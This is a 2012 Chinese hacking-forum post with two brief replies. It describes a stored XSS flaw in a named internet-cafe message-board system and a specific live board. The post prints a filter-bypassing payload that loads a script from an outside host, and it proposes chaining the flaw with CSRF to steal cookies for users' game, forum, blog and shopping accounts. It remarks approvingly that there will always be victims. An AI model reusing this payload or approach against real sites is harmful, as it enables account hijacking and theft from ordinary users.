天马行空工作室

 找回密码
 加入天马
搜索
查看: 3042|回复: 2

网吧留言板系统存储型xss 结合csrf 盗取信息

[复制链接]
发表于 2012-8-22 01:08:08 | 显示全部楼层 |阅读模式
发现网吧新换了留言板,
1.JPG
测试
发现过滤了<xx>形式的标签,这样很多就没法构造,后来想到用<!--//-->构造,虽然可以屏蔽一些内容,但还是很难构造出完整的代码,后来干脆不闭合标签,直接
  1. <script /src=//tmxk.org/q.js
复制代码
测试成功!
2.JPG
因为这个站本身的cookie没啥用,但csrf嵌入别的站(游戏、论坛、博客、网购等),就可以盗取这些站的cookie,因为是基于客户端的服务,这样的总会有人去留言,总会有人受害。

这个留言系统是http://www.wbhome.net/
我测试的是:http://xsjwlhs.wbhome.net/
发表于 2012-8-22 18:58:35 | 显示全部楼层
好像就这几个人发帖  然后还是这几个人回帖  然后  ,没有了然后
发表于 2012-8-25 19:14:06 | 显示全部楼层
貌似我们这也是这样的留言系统
您需要登录后才可以回帖 登录 | 加入天马

本版积分规则

Archiver|手机版|小黑屋|天马行空工作室 ( 京ICP备12003429号  

GMT+8, 2019-10-21 10:44 , Processed in 1.386922 second(s), 26 queries .

Powered by Discuz! v8

© 2010-2014 网吧留言板系统存储型xss 结合csrf 盗取信息 - XSS 天马行空工作室

快速回复 返回顶部 返回列表